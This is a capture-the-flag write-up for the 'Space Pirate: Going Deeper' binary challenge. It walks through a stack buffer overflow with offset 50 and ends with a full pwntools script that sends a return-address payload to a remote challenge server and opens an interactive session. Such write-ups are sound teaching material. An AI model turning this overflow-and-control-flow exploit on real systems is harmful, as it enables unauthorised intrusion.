Space Pirate : Going Deeper
Solved by: Taz34
Here we have a 64 bit binary which takes input as follows:
After playing around with the binary i came across a Segmentation fault, hence we have a buffer overflow exploit here.
So I found the offset to be 50.
Now to understand the working of the binary I opened the binary in Cutter https://cutter.re/
Here we came across the main function and another interesting function named admin_panel In the admin_panel function we came across an if statement:
From here we can understand that, if we want to print the flag i.e.
we need to make the if condition false.
So now we can create the payload
payload = b'A'*offset + ret_addr_main + ret_addr_admin_panel + if_arg1 + if_arg3 + if_arg3 payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) +p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef)
Now we have our payload set, hence the final script:
from pwn import * #elf = ELF('./sp_going_deeper') #p = elf.process() p = remote("22.214.171.124", 31239) payload = b'A'*50 + p64(0x400b9a) + p64(0x400b46) +p64(0xdeadbeef) + p64(0x1337c0de) + p64(0x1337beef) p.sendline('1') p.sendline(payload) p.interactive()
And here the flag is dumped.